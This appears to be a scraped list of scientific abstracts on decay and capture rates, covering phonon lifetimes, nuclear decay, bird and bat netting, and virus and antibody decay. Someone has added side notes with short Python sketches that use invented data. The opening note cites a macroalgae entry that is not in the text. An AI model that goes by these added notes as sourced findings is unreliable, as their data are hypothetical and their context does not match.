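The biomass decay constants in the macroalgae entry above (quoted in k d^-1) come from litterbag time series; under a single-exponential model, k is the slope of a linear fit of -ln(mass fraction remaining) against time. A small sketch with made-up litterbag data follows.

```python
import math

# Hypothetical litterbag time series: days since deployment and fraction of
# initial dry biomass remaining (single-exponential decay assumed).
days = [0, 2, 4, 7, 10, 14]
fraction = [1.00, 0.50, 0.26, 0.09, 0.035, 0.009]

# Least-squares slope of -ln(fraction) vs time gives the decay constant k [d^-1]
xs = days
ys = [-math.log(f) for f in fraction]
n = len(xs)
xbar = sum(xs) / n
ybar = sum(ys) / n
k = sum((x - xbar) * (y - ybar) for x, y in zip(xs, ys)) / sum((x - xbar) ** 2 for x in xs)
print(f"fitted decay constant k = {k:.2f} d^-1")
```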
The basic ingredients of the theory include full phonon dispersion relations obtained from the application of an adiabatic bond charge model and crystal anharmonic potential within the isotropic elastic continuum model. The role of various decay routes, such as Klemens, Ridley, Vallée-Bogani and Barman-Srivastava channels, in determining the lifetimes of the Raman active zone-centre longitudinal optical (LO) modes in BN (zincblende structure) and A1(LO) modes in AlN, GaN and InN (wurtzite structure) has been quantified. 2. Temporal patterns in capture rate and sex ratio of forest bats in Arkansas Treesearch Roger W. Perry; S. Andrew Carter; Ronald E. Thill 2010-01-01 We quantified changes in capture rates and sex ratios from May to Sept. for eight species of bats, derived from 8 y of extensive mist netting in forests of the Ouachita Mountains, Arkansas. Our primary goal was to determine patterns of relative abundance for each species of bat captured over forest streams and to determine if these patterns were similar to patterns of... 3. Electron capture decay of 58-min U-229(92) and levels in Pa-229(91) SciTech Connect Ahmad, I.; Chasman, R. R.; Greene, J. P.; Kondev, F. G.; Zhu, S. 2015-08-17 Electron capture decay of U-229 is investigated by measuring the gamma-ray and conversion electron spectra of mass-separated and unseparated U-229 sources with high-resolution germanium and silicon detectors, respectively. Gamma-gamma coincidence measurements are also performed using germanium detectors. These studies provide level energies and level ordering in Pa-229. Single-particle assignments are given to these levels which are in agreement with the systematics in this region and also with theory. In a previous study, we report the observation of a 5/2(+/-) parity doublet in the Pa-229 ground state, which is a signature of octupole deformation. The present analysis of the data still shows a splitting of 60 +/- 50 eV, but with this large uncertainty the existence of the doublet is not certain. 4. Coping with mist-net capture-rate bias: Canopy height and several extrinsic factors USGS Publications Warehouse Mallory, Elizabeth P.; Brokaw, Nicholas V. L.; Hess, Steven C. 2004-01-01 Many factors other than a species' actual abundance can affect mist-net capture rates. We used ANCOVA models to quantify some potential biases and control their effects, producing adjusted estimates of capture rates that are more directly comparable among mist-net stations. Data came from 46 two-day mist-net sessions from September 1990 to May 1992 at six subtropical forest stations in the Rio Bravo Conservation and Management Area, northwest Belize. Factors evaluated included canopy height at net sites, long-term net shyness (days elapsed between first and last netting day of the entire study period), season (wet vs. dry), total rainfall during a netting session, and temperature. Number of individuals and species captured/10 net-h declined at each net with increasing canopy height above the net. Capture rates differed significantly among some of the stations. Elapsed days and rainfall caused significant bias in capture rates, which were statistically controlled within the ANCOVA, whereas season and temperature did not. Capture rates varied among sessions, but there was a slight and significant decline over the entire study period for all stations combined. Rainfall significantly depressed capture rates somewhat on a daily basis, but capture rates did not differ between wet and dry seasons. 
When we replaced the station variable in the ANCOVA with mean canopy height, the model was still highly significant, but did not explain as much of the variation in capture rates. Statistical analysis provides an objective means of interpreting data and estimating reliability, but only if statistical assumptions of the analyses are met. We discuss the need for including randomization in the experimental design, standardizing netting protocol, and quantifying sources of bias in the field, before ANCOVA or other parametric statistical techniques can be used to partition effects of biases. 5. Calculations on decay rates of various proton emissions Qian, Yibin; Ren, Zhongzhou 2016-03-01 Proton radioactivity of neutron-deficient nuclei around the dripline has been systematically studied within the deformed density-dependent model. The crucial proton-nucleus potential is constructed via the single-folding integral of the density distribution of daughter nuclei and the effective M3Y nucleon-nucleon interaction or the proton-proton Coulomb interaction. After the decay width is obtained by the modified two-potential approach, the final decay half-lives can be achieved by involving the spectroscopic factors from the relativistic mean-field (RMF) theory combined with the BCS method. Moreover, a simple formula along with only one adjusted parameter is tentatively proposed to evaluate the half-lives of proton emitters, where the introduction of nuclear deformation is somewhat discussed as well. It is found that the calculated results are in satisfactory agreement with the experimental values and consistent with other theoretical studies, indicating that the present approach can be applied to the case of proton emission. Predictions on half-lives are made for possible proton emitters, which may be useful for future experiments. 6. Neutron-capture rates for explosive nucleosynthesis: the case of 68Ni(n, γ)69Ni Spyrou, A.; Larsen, A. C.; Liddick, S. N.; Naqvi, F.; Crider, B. P.; Dombos, A. C.; Guttormsen, M.; Bleuel, D. L.; Couture, A.; Crespo Campo, L.; Lewis, R.; Mosby, S.; Mumpower, M. R.; Perdikakis, G.; Prokop, C. J.; Quinn, S. J.; Renstrøm, T.; Siem, S.; Surman, R. 2017-04-01 Neutron-capture reactions play an important role in heavy element nucleosynthesis, since they are the driving force for the two processes that create the vast majority of the heavy elements. When a neutron capture occurs on a short-lived nucleus, it is extremely challenging to study the reaction directly and therefore the use of indirect techniques is essential. The present work reports on such an indirect measurement that provides strong constraints on the 68Ni(n, γ)69Ni reaction rate. This is done by populating the compound nucleus 69Ni via the β decay of 69Co and measuring the γ-ray deexcitation of excited states in 69Ni. The β-Oslo method was used to extract the γ-ray strength function and the nuclear level density. In addition the half-life of 69Co was extracted and found to be in agreement with previous literature values. Before the present results, the 68Ni(n, γ)69Ni reaction was unconstrained and the purely theoretical reaction rate was highly uncertain. The new uncertainty on the reaction rate based on the present experiment (variation between upper and lower limit) is approximately a factor of 3. The commonly used reaction libraries JINA-REACLIB and BRUSLIB are in relatively good agreement with the experimental rate. The impact of the new rate on weak r-process calculations is discussed. 7. 
Seasonal determinations of algal virus decay rates reveal overwintering in a temperate freshwater pond. PubMed Long, Andrew M; Short, Steven M 2016-07-01 To address questions about algal virus persistence (i.e., continued existence) in the environment, rates of decay of infectivity for two viruses that infect Chlorella-like algae, ATCV-1 and CVM-1, and a virus that infects the prymnesiophyte Chrysochromulina parva, CpV-BQ1, were estimated from in situ incubations in a temperate, seasonally frozen pond. A series of experiments were conducted to estimate rates of decay of infectivity in all four seasons, with incubations lasting 21 days in spring, summer and autumn, and 126 days in winter. Decay rates observed across this study were relatively low compared with previous estimates obtained for other algal viruses, and ranged from 0.012 to 11% h^-1. Overall, the virus CpV-BQ1 decayed most rapidly whereas ATCV-1 decayed most slowly, but for all viruses the highest decay rates were observed during the summer and the lowest were observed during the winter. Furthermore, the winter incubations revealed the ability of each virus to overwinter under ice, as ATCV-1, CVM-1 and CpV-BQ1 retained up to 48%, 19% and 9% of their infectivity after 126 days, respectively. The observed resilience of algal viruses in a seasonally frozen freshwater pond provides a mechanism that can support the maintenance of viral seed banks in nature. However, the high rates of decay observed in the summer demonstrate that virus survival, and therefore environmental persistence, can be subject to seasonal bottlenecks. 8. Seasonal determinations of algal virus decay rates reveal overwintering in a temperate freshwater pond PubMed Central Long, Andrew M; Short, Steven M 2016-01-01 PMID:26943625 9. Continuum-state and bound-state β- decay rates of the neutron Faber, M.; Ivanov, A. N.; Ivanova, V. A.; Marton, J.; Pitschmann, M.; Serebrov, A. P.; Troitskaya, N. I.; Wellenzohn, M. 2009-09-01 For the β- decay of the neutron we analyze the continuum-state and bound-state decay modes.
We calculate the decay rates, the electron energy spectrum for the continuum-state decay mode, and angular distributions of the decay probabilities for the continuum-state and bound-state decay modes. The theoretical results are obtained for the new value of the axial coupling constant gA = 1.2750(9), obtained recently by H. Abele [Prog. Part. Nucl. Phys. 60, 1 (2008)] from a fit of the experimental data on the correlation coefficient between the neutron spin and the electron momentum in the electron energy spectrum of the continuum-state decay mode. We take into account the contribution of radiative corrections and the scalar and tensor weak couplings. The calculated angular distributions of the probabilities of the bound-state decay modes of the polarized neutron can be used for experimental measurements of the bound-state β- decays into the hyperfine states with total angular momentum F=1 and of the scalar and tensor weak coupling constants. 10. Dose point kernel for boron-11 decay and the cellular S values in boron neutron capture therapy. PubMed Ma, Yunzhi; Geng, JinPeng; Gao, Song; Bao, Shanglian 2006-12-01 The study of the radiobiology of boron neutron capture therapy is based on cellular-level dosimetry of boron-10's thermal neutron capture reaction 10B(n,α)7Li, in which one 1.47 MeV helium-4 ion and one 0.84 MeV lithium-7 ion are produced. Because of the chemical preference of boron-10 carrier molecules, the dose is heterogeneously distributed in cells. In the present work, the (scaled) dose point kernel of boron-11 decay, called 11B-DPK, was calculated with the GEANT4 Monte Carlo simulation code. The DPK curve drops suddenly at a radius of 4.26 μm, the continuous slowing down approximation (CSDA) range of the lithium-7 ion. Then, after a slight rise, the curve decreases to near zero when the radius goes beyond 8.20 μm, which is the CSDA range of a 1.47 MeV helium-4 ion. With the DPK data, S values for nuclei and cells with boron-10 on the cell surface are calculated for different combinations of cell and nucleus sizes. The S value for a cell radius of 10 μm and a nucleus radius of 5 μm is slightly larger than the value published by Tung et al. [Appl. Radiat. Isot. 61, 739-743 (2004)]. This result is potentially more accurate than the published value since it includes the contribution of the lithium-7 ion as well as the alpha particle. 11. Examination of the calorimetric spectrum to determine the neutrino mass in low-energy electron capture decay Robertson, R. G. H. 2015-03-01 Background: The standard kinematic method for determining the neutrino mass from the β decay of tritium or another isotope is to measure the shape of the electron spectrum near the endpoint. A similar distortion of the "visible energy" remaining after electron capture is caused by neutrino mass. There has been a resurgence of interest in using this method with 163Ho, driven by technological advances in microcalorimetry. Recent theoretical analyses offer reassurance that there are no significant theoretical uncertainties. Purpose: The theoretical analyses consider only single-vacancy states in the daughter 163Dy atom. It is necessary to consider configurations with more than one vacancy that can be populated owing to the change in nuclear charge. Method: The shakeup and shake-off theory of Carlson and Nestor is used as a basis for estimating the population of double-vacancy states.
Results: A spectrum of satellites associated with each primary vacancy created by electron capture is presented. Conclusions: The theory of the calorimetric spectrum is more complicated than has been described heretofore. There are numerous shakeup and shake-off satellites present across the spectrum, and some may be very near the endpoint. The spectrum shape is presently not understood well enough to permit a sensitive determination of the neutrino mass in this way. 12. Beta decay rates of neutron-rich nuclei SciTech Connect Marketin, Tomislav; Huther, Lutz; Martínez-Pinedo, Gabriel 2015-10-15 Heavy element nucleosynthesis models involve various properties of thousands of nuclei in order to simulate the intricate details of the process. By necessity, as most of these nuclei cannot be studied in a controlled environment, these models must rely on the nuclear structure models for input. Of all the properties, the beta-decay half-lives are one of the most important ones due to their direct impact on the resulting abundance distributions. Currently, a single large-scale calculation is available based on a QRPA calculation with a schematic interaction on top of the Finite Range Droplet Model. In this study we present the results of a large-scale calculation based on the relativistic nuclear energy density functional, where both the allowed and the first-forbidden transitions are studied in more than 5000 neutron-rich nuclei. 13. Determining neutron capture cross sections with the Surrogate Reaction Technique: Measuring decay probabilities with STARS SciTech Connect Church, J A; Ahle, L; Bernstein, L A; Cooper, J; Dietrich, F S; Escher, J; Forssen, C; Ai, H; Amro, H; Babilon, M; Beausang, C; Caggiano, J; Heinz, A; Hughes, R; McCutchan, E; Meyer, D; Plettner, C; Ressler, J; Zamfir, V 2004-07-14 Neutron-induced reaction cross sections are sometimes difficult to measure due to target or beam limitations. For two-step reactions proceeding through an equilibrated intermediate state, an alternate ''surrogate reaction'' technique can be applicable, and is currently undergoing investigation at LLNL. Measured decay probabilities for the intermediate nucleus formed in a light-ion reaction can be combined with optical-model calculations for the formation of the same intermediate nucleus via the neutron-induced reaction. The result is an estimation for overall (n,{gamma}/n/2n) cross sections. As a benchmark, the reaction {sup 92}Zr({alpha},{alpha}'), surrogate, for n+{sup 91}Zr, was studied at the A.W. Wright Nuclear Structure Laboratory at Yale. Particles were detected in the silicon telescope STARS (Silicon Telescope Array for Reaction Studies) and {gamma}-ray energies measured with germanium clover detectors from the YRAST (Yale Rochester Array for SpecTroscopy) ball. The experiment and preliminary observations will be discussed. 14. Neutron capture cross-section studies of Tellurium isotopes for neutrinoless double beta decay applications Bhike, Megha; Tornow, Werner 2014-09-01 The CUORE detector at Gran Sasso, aimed at searching for neutrinoless double-beta decay of 130Te, employs an array of TeO2 bolometer modules. To understand and identify the contribution of muon and (α,n) induced neutrons to the CUORE background, fast neutron cature cross-section data of the tellurium isotopes 126Te, 128Te and 130Te have been measured with the activation method at eight different energies in the neutron energy range 0.5-7.5 MeV. 
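(A side note on the surrogate-reaction (STARS) entry above: the combination step it describes amounts, in the Weisskopf-Ewing limit, to multiplying an optical-model compound-nucleus formation cross section by the exit-channel decay probability measured in the surrogate reaction. The sketch below only illustrates that arithmetic; the function name and the numerical values are hypothetical, not results from the STARS measurement.)

```python
def surrogate_cross_section(sigma_formation_mb, decay_probability):
    """Weisskopf-Ewing-style estimate: sigma(n, x) ~ sigma_CN(formation) * P(decay to x).

    sigma_formation_mb : compound-nucleus formation cross section from an
                         optical-model calculation (millibarns).
    decay_probability  : exit-channel probability measured in the surrogate
                         reaction at the matching excitation energy.
    """
    return sigma_formation_mb * decay_probability

# Purely illustrative numbers:
sigma_cn = 1200.0   # mb, hypothetical optical-model formation cross section
p_gamma = 0.05      # hypothetical measured gamma-decay probability
print(f"sigma(n,gamma) ~ {surrogate_cross_section(sigma_cn, p_gamma):.1f} mb")
```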
Plastic pill boxes of diameter 1.6 cm and width 1 cm containing Te were irradiated with mono-energetic neutrons produced via the 3H(p,n)3He and 2H(d,n)3He reactions. The cross-sections were determined relative to the 197Au(n, γ)198Au and 115In(n,n')115m In standard cross sections. The activities of the products were measured using 60% lead-shielded HPGe detectors at TUNL's low background counting facility. The present results are compared with the evaluated data from TENDL-2012, ENDF/B-VII.1, JEFF-3.2 and JENDL-4.0, as well as with literature data. 15. Determining neutron capture cross sections with the Surrogate Reaction Technique: Measuring decay probabilities with STARS Church, J. A.; Ahle, L.; Bernstein, L. A.; Cooper, J.; Dietrich, F. S.; Escher, J.; Forssen, C.; Ai, H.; Amro, H.; Babilon, M.; et al. 2005-07-01 Neutron-induced reaction cross sections are sometimes difficult to measure due to target or beam limitations. For two-step reactions proceeding through an equilibrated intermediate state, an alternate "surrogate reaction" technique [J.D. Cramer and H.C. Britt, Nucl. Sci. Eng. 41, 177 (1970), H.C. Britt and J.B. Wilhelmy, Nucl. Sci. Eng. 72, 222 (1979), W.Younes and H.C. Britt, Phys. Rev. C 67, 024610 (2003)] can be applicable, and is currently undergoing investigation at LLNL. Measured decay probabilities for the intermediate nucleus formed in a light-ion reaction can be combined with optical-model calculations for the formation of the same intermediate nucleus via the neutron-induced reaction. The result is an estimation for overall (n,γ/n/2n) cross sections. As a bench-mark, the reaction 92Zr(α, α'), surrogate for n+91Zr, was studied at the A.W. Wright Nuclear Structure Laboratory at Yale. Particles were detected in the silicon telescope STARS (Silicon Telescope Array for Reaction Studies) and γ-ray energies measured with germanium clover detectors from the YRAST (Yale Rochester Array for SpecTroscopy) ball. The experiment and preliminary observations will be discussed. 16. Constraining spacetime variations of nuclear decay rates from light curves of type Ia supernovae Karpikov, Ivan; Piskunov, Maxim; Sokolov, Anton; Troitsky, Sergey 2015-06-01 The luminosity of fading type Ia supernovae is governed by radioactive decays of Ni 56 and Co 56 . The decay rates are proportional to the Fermi coupling constant GF and, therefore, are determined by the vacuum expectation value v of the Brout-Englert-Higgs field. We use publicly available sets of light curves of type Ia supernova at various redshifts to constrain possible spacetime variations of the Ni 56 decay rate. The resulting constraint is not very tight; however, it is the only direct bound on the variation of the decay rate for redshifts up to z ˜1 . We discuss potential applications of the result to searches for nonconstancy of GF and v . 17. Capture-recapture estimation of prebreeding survival rate for birds exhibiting delayed maturation USGS Publications Warehouse Nichols, J.D.; Spendelow, J.A.; Hines, J.E. 1990-01-01 Many species of seabirds exhibit delayed maturity and do not return to the natal colony to breed for several years after fledging. Capture-recapture studies are frequently conducted at such breeding colonies and often include marking of young birds. However, because of the absence of these birds from the natal colony during the first few years after banding, the data do not fit neatly into existing capture-recapture models. 
Here we present a method for estimating prebreeding survival rate from capture-recapture studies on species exhibiting such patterns of delayed maturation. We illustrate the method using data from a capture-recapture study of Roseate Terns (Sterna dougallii ) on Falkner Island, Connecticut. The method appears to work well and emphasizes the potential to tailor capture-recapture models to specific field situations. 18. Predator-prey encounter and capture rates for plankton in turbulent environments Pécseli, H. L.; Trulsen, J.; Fiksen, Ø. 2012-08-01 Turbulence plays an important role for predator-prey interactions in aquatic environments. In one sense turbulence benefits the predator by increasing its encounter rate with prey, but on the other hand it can benefit the prey by making them more difficult to catch. In the present study of this problem, a turbulent flow field is obtained by direct numerical solution of the Navier-Stokes equation. The analysis includes the effects of the turbulence on the encounter rate between passively moving predators and prey, and at the same time also models the capture probability depending on the relative turbulent motions of predator and prey. Analytical results for scaling laws for planktonic encounter and capture rates in turbulent environments are obtained in terms of the basic parameters for the problem, and the results are compared with related findings reported in the literature. For large values of the specific energy dissipation rates ɛ the turbulence reduces the capture probability significantly, in part also because the effective capture range reduces for increasing turbulence intensity. The results presented here predict the parameters for an optimum turbulence level for the predator capture rate. For enhanced turbulence levels sudden bursts in the space-time varying velocity field contribute to a noise level that can reduce the probability for capturing prey. We consider cases where the capture range of an organism is comparable to or smaller than the effective Kolmogorov length scale, as well as the opposite limit of larger capture ranges in the inertial range of the turbulence. The reference model assumes spherical interception volumes, but it is demonstrated that the results remain basically valid also for the case where these volumes are hemispherical or conical: the consequences of having a shape of the interception surface deviating from a sphere can be accounted for by an empirical scaling factor, which depends solely on the opening angle of the cone. 19. WEST NILE VIRUS ANTIBODY DECAY RATE IN FREE-RANGING BIRDS. PubMed McKee, Eileen M; Walker, Edward D; Anderson, Tavis K; Kitron, Uriel D; Brawn, Jeffrey D; Krebs, Bethany L; Newman, Christina; Ruiz, Marilyn O; Levine, Rebecca S; Carrington, Mary E; McLean, Robert G; Goldberg, Tony L; Hamer, Gabriel L 2015-07-01 Antibody duration, following a humoral immune response to West Nile virus (WNV) infection, is poorly understood in free-ranging avian hosts. Quantifying antibody decay rate is important for interpreting serologic results and for understanding the potential for birds to serorevert and become susceptible again. We sampled free-ranging birds in Chicago, Illinois, US, from 2005 to 2011 and Atlanta, Georgia, US, from 2010 to 2012 to examine the dynamics of antibody decay following natural WNV infection. Using serial dilutions in a blocking enzyme-linked immunosorbent assay, we quantified WNV antibody titer in repeated blood samples from individual birds over time. 
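(A side note on the West Nile virus antibody entry in progress here: the decay rates reported just after this sketch, in natural-log units per month, correspond to the slope of a log-linear fit of titer against time since exposure. The titer values below are invented for illustration; only the units and the fitting idea come from the entry.)

```python
import numpy as np

# Hypothetical repeated titer measurements for one bird (months since first capture).
months = np.array([0.0, 6.0, 12.0, 24.0])
titers = np.array([320.0, 110.0, 40.0, 6.0])   # illustrative antibody titers

# Log-linear fit: the slope is the decay rate in natural-log units per month,
# the same units used for the rates reported in this entry.
slope, intercept = np.polyfit(months, np.log(titers), 1)
print(f"decay rate ~ {-slope:.3f} ln-units per month")
print(f"projected time to titer < 10: {(np.log(10) - intercept) / slope:.1f} months")
```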
We quantified a rate of antibody decay for 23 Northern Cardinals (Cardinalis cardinalis) of 0.198 natural log units per month and 24 individuals of other bird species of 0.178 natural log units per month. Our results suggest that juveniles had a higher rate of antibody decay than adults, which is consistent with nonlinear antibody decay at different times postexposure. Overall, most birds had undetectable titers 2 yr postexposure. Nonuniform WNV antibody decay rates in free-ranging birds underscore the need for cautious interpretation of avian serology results in the context of arbovirus surveillance and epidemiology. 20. Probing CP violation with time integrated decay rates into non-CP eigenstates Silva, João P. 1998-07-01 Many of the experiments proposed to look for interference CP violation in neutral B mesons concentrate on tagged decay into CP eigenstates. Aleksan, Dunietz, Kayser and Le Diberder have shown that one can also look for interference CP violation using tagged decays into non-CP eigenstates. In all these methods, one must trace the time dependence of the decays. In this article we discuss a new method to search for interference CP violation by using only time integrated rates into non-CP eigenstates. The method hinges on the comparison between the decays of Υ(4S) into ff, f¯f¯, and ff¯, and also uses the rates for l+f and l-f. This method does not depend on how the Υ(4S) is produced; provided enough statistics, one can use both symmetric and asymmetric colliders. 1. Mesh size and bird capture rates in Mato Grosso do Sul State, Brazil. PubMed Piratelli, A 2003-02-01 Mist-nets alternating 36-mm and 61-mm mesh in woods and low vegetation of "cerrado" (Brazilian savanna) tested bird-capture efficiency relative to bird length and mass. Of 1,296 birds captured and 102 species, 785 (93 species) were with 36-m mesh and 511 (69 species) with 61-mm mesh. The 61-mm mesh improved capture rates only for some larger species; so, in general, 36-mm mesh mist-nets are more appropriate for field work in "cerrado" areas. 2. A measurement of the gluon splitting rate into /cc¯ pairs in hadronic Z decays ALEPH Collaboration; Heister, A.; Schael, S.; Barate, R.; Brunelière, R.; de Bonis, I.; Decamp, D.; Goy, C.; Jezequel, S.; Lees, J.-P.; Martin, F.; Merle, E.; Minard, M.-N.; Pietrzyk, B.; Trocmé, B.; Bravo, S.; Casado, M. P.; Chmeissani, M.; Crespo, J. M.; Fernandez, E.; Fernandez-Bosman, M.; Garrido, Ll.; Martinez, M.; Pacheco, A.; Ruiz, H.; Colaleo, A.; Creanza, D.; de Filippis, N.; de Palma, M.; Iaselli, G.; Maggi, G.; Maggi, M.; Nuzzo, S.; Ranieri, A.; Raso, G.; Ruggieri, F.; Selvaggi, G.; Silvestris, L.; Tempesta, P.; Tricomi, A.; Zito, G.; Huang, X.; Lin, J.; Ouyang, Q.; Wang, T.; Xie, Y.; Xu, R.; Xue, S.; Zhang, J.; Zhang, L.; Zhao, W.; Abbaneo, D.; Barklow, T.; Buchmüller, O.; Cattaneo, M.; Cerutti, F.; Clerbaux, B.; Drevermann, H.; Forty, R. W.; Frank, M.; Gianotti, F.; Hansen, J. B.; Harvey, J.; Hutchcroft, D. E.; Janot, P.; Jost, B.; Kado, M.; Mato, P.; Moutoussi, A.; Ranjard, F.; Rolandi, L.; Schlatter, D.; Sguazzoni, G.; Tejessy, W.; Teubert, F.; Valassi, A.; Videau, I.; Badaud, F.; Dessagne, S.; Falvard, A.; Fayolle, D.; Gay, P.; Jousset, J.; Michel, B.; Monteil, S.; Pallin, D.; Pascolo, J. M.; Perret, P.; Hansen, J. D.; Hansen, J. R.; Hansen, P. H.; Kraan, A.; Nilsson, B. 
S.; Kyriakis, A.; Markou, C.; Simopoulou, E.; Vayaki, A.; Zachariadou, K.; Blondel, A.; Brient, J.-C.; Machefert, F.; Rougé, A.; Swynghedauw, M.; Tanaka, R.; Videau, H.; Ciulli, V.; Focardi, E.; Parrini, G.; Antonelli, A.; Antonelli, M.; Bencivenni, G.; Bossi, F.; Capon, G.; Chiarella, V.; Laurelli, P.; Mannocchi, G.; Murtas, G. P.; Passalacqua, L.; Kennedy, J.; Lynch, J. G.; Negus, P.; O'Shea, V.; Thompson, A. S.; Wasserbaech, S.; Cavanaugh, R.; Dhamotharan, S.; Geweniger, C.; Hanke, P.; Hepp, V.; Kluge, E. E.; Leibenguth, G.; Putzer, A.; Stenzel, H.; Tittel, K.; Wunsch, M.; Beuselinck, R.; Cameron, W.; Davies, G.; Dornan, P. J.; Girone, M.; Hill, R. D.; Marinelli, N.; Nowell, J.; Rutherford, S. A.; Sedgbeer, J. K.; Thompson, J. C.; White, R.; Ghete, V. M.; Girtler, P.; Kneringer, E.; Kuhn, D.; Rudolph, G.; Bouhova-Thacker, E.; Bowdery, C. K.; Clarke, D. P.; Ellis, G.; Finch, A. J.; Foster, F.; Hughes, G.; Jones, R. W. L.; Pearson, M. R.; Robertson, N. A.; Smizanska, M.; van der Aa, O.; Delaere, C.; Lemaitre, V.; Blumenschein, U.; Hölldorfer, F.; Jakobs, K.; Kayser, F.; Kleinknecht, K.; Müller, A.-S.; Renk, B.; Sander, H.-G.; Schmeling, S.; Wachsmuth, H.; Zeitnitz, C.; Ziegler, T.; Bonissent, A.; Coyle, P.; Curtil, C.; Ealet, A.; Fouchez, D.; Payre, P.; Tilquin, A.; Ragusa, F.; David, A.; Dietl, H.; Ganis, G.; Hüttmann, K.; Lütjens, G.; Männer, W.; Moser, H.-G.; Settles, R.; Villegas, M.; Wolf, G.; Boucrot, J.; Callot, O.; Davier, M.; Duflot, L.; Grivaz, J.-F.; Heusse, Ph.; Jacholkowska, A.; Serin, L.; Veillet, J.-J.; Azzurri, P.; Bagliesi, G.; Boccali, T.; Foà, L.; Giammanco, A.; Giassi, A.; Ligabue, F.; Messineo, A.; Palla, F.; Sanguinetti, G.; Sciabà, A.; Spagnolo, P.; Tenchini, R.; Venturi, A.; Verdini, P. G.; Awunor, O.; Blair, G. A.; Cowan, G.; Garcia-Bellido, A.; Green, M. G.; Jones, L. T.; Medcalf, T.; Misiejuk, A.; Strong, J. A.; Teixeira-Dias, P.; Clifft, R. W.; Edgecock, T. R.; Norton, P. R.; Tomalin, I. R.; Ward, J. J.; Bloch-Devaux, B.; Boumediene, D.; Colas, P.; Fabbro, B.; Lançon, E.; Lemaire, M.-C.; Locci, E.; Perez, P.; Rander, J.; Tuchming, B.; Vallage, B.; Konstantinidis, N.; Litke, A. M.; Taylor, G.; Booth, C. N.; Cartwright, S.; Combley, F.; Hodgson, P. N.; Lehto, M.; Thompson, L. F.; Böhrer, A.; Brandt, S.; Grupen, C.; Hess, J.; Ngac, A.; Prange, G.; Borean, C.; Giannini, G.; He, H.; Putz, J.; Rothberg, J.; Armstrong, S. R.; Berkelman, K.; Cranmer, K.; Ferguson, D. P. S.; Gao, Y.; González, S.; Hayes, O. J.; Hu, H.; Jin, S.; Kile, J.; McNamara, P. A.; Nielsen, J.; Pan, Y. B.; von Wimmersperg-Toeller, J. H.; Wiedenmann, W.; Wu, J.; Wu, Sau Lan; Wu, X.; Zobernig, G.; Dissertori, G. 2003-05-01 The rate of gluon splitting into /cc¯ pairs in hadronic Z decays is measured using the data sample collected by ALEPH from 1991 to 1995. The selection is based on the identification of leptons (electrons and muons) originating from semileptonic charm decays, and on the topological properties of signal events. The result derived from the selected sample is gcc¯=(3.26+/-0.23(stat)+/-0.42(syst))%. 3. Hawking-Moss Bounces and Vacuum Decay Rates SciTech Connect Weinberg, Erick J. 2007-06-22 The conventional interpretation of the Hawking-Moss (HM) solution implies a transition rate between vacua that depends only on the values of the potential in the initial vacuum and at the top of a potential barrier, leading to the implausible conclusion that transitions to distant vacua can be as likely as those to a nearby one. 
I analyze this issue using a nongravitational example with analogous properties. I show that such HM bounces do not give reliable rate calculations, but are instead related to the probability of finding a quasistable configuration at a local potential maximum. 4. Evidence from Voyager and ISEE-3 spacecraft. Data for the decay of secondary K-electron capture isotopes during the propagation of cosmic rays in the Galaxy Soutoul, A.; Legrain, R.; Lukasiak, A.; McDonald, F. B.; Webber, W. R. 1998-08-01 New data from the cosmic ray experiment on the Voyager spacecraft confirms and extends earlier data from a similar experiment on the ISEE-3 spacecraft which indicates the possibility of the decay of certain K-capture isotopes during the interstellar propagation of galactic cosmic rays. These cosmic ray measurements, along with the cross section measurements, indicate that ~ 25% of the K-capture isotopes (51Cr and (49V produced as secondaries have decayed at interstellar energy of ~ 400 MeV/nuc. This suggests a possible interstellar energy gain ~ 100 MeV/nuc out of the current interstellar energy ~ 500 MeV/nuc. This measurement suggests that the study of the K-capture isotopes may now have reached a level that will soon provide definitive information on the amount of re-acceleration that may occur during cosmic-ray propagation after an initial acceleration in the cosmic ray sources. 5. Comparative capture rate responses of mosquito vectors to light trap and human landing collection methods USDA-ARS?s Scientific Manuscript database Landing rates (LR) of female Anopheles quadrimaculatus, Culex nigripalpus, Cx. quinquefasciatus, Ochlerotatus triseriatus and Aedes albopictus on human hosts were compared with capture rates responses by the same species to CDC-type light traps (LT) augmented with CO2. A significant relationship be... 6. Short term memory bowing effect is consistent with presentation rate dependent decay. PubMed Tarnow, Eugen 2010-12-01 I reanalyze the free recall data of Murdock, J Exp Psychol 64(5):482-488 (1962) and Murdock and Okada, J Verbal Learn and Verbal Behav 86:263-267 (1970) which show the famous bowing effect in which initial and recent items are recalled better than intermediate items (primacy and recency effects). Recent item recall probabilities follow a logarithmic decay with time of recall consistent with the tagging/retagging theory. The slope of the decay increases with increasing presentation rate. The initial items, with an effectively low presentation rate, decay with the slowest logarithmic slope, explaining the primacy effect. The finding that presentation rate limits the duration of short term memory suggests a basis for memory loss in busy adults, for the importance of slow music practice, for long term memory deficiencies for people with attention deficits who may be artificially increasing the presentation rates of their surroundings. A well-defined, quantitative measure of the primacy effect is introduced. 7. Geometrical scaling and modal decay rates in periodic arrays of deeply subwavelength Terahertz resonators SciTech Connect 2014-12-21 It is well known that due to the high conductivity of noble metals at terahertz frequencies and scalability of macroscopic Maxwell equations, a geometrical downscaling of a terahertz resonator results in the linear upscaling of its resonance frequency. However, the scaling laws of modal decay rates, important for the resonator excitation efficiency, are much less known. 
Here, we investigate the extent to which the scale-invariance of decay rates is violated due to the finite conductivity of the metal. We find that the resonance quality factor or the excitation efficiency may be substantially affected by scaling and show that this happens as a result of the scale-dependence of the metal absorption rate, while the radiative decay and the dielectric cavity absorption rates are approximately scale-invariant. In particular, we find that by downscaling overcoupled resonators, their excitation efficiency increases, while the opposite happens with undercoupled resonators. 8. Relativistic quasiparticle random-phase approximation calculation of total muon capture rates SciTech Connect Marketin, T.; Paar, N.; Niksic, T.; Vretenar, D. 2009-05-15 The relativistic proton-neutron quasiparticle random phase approximation (pn-RQRPA) is applied in the calculation of total muon capture rates on a large set of nuclei from {sup 12}C to {sup 244}Pu, for which experimental values are available. The microscopic theoretical framework is based on the relativistic Hartree-Bogoliubov (RHB) model for the nuclear ground state, and transitions to excited states are calculated using the pn-RQRPA. The calculation is fully consistent, i.e., the same interactions are used both in the RHB equations that determine the quasiparticle basis, and in the matrix equations of the pn-RQRPA. The calculated capture rates are sensitive to the in-medium quenching of the axial-vector coupling constant. By reducing this constant from its free-nucleon value g{sub A}=1.262 by 10% for all multipole transitions, the calculation reproduces the experimental muon capture rates to better than 10% accuracy. 9. Beyond the bucket: testing the effect of experimental design on rate and sequence of decay Gabbott, Sarah; Murdock, Duncan; Purnell, Mark 2016-04-01 Experimental decay has revealed the potential for profound biases in our interpretations of 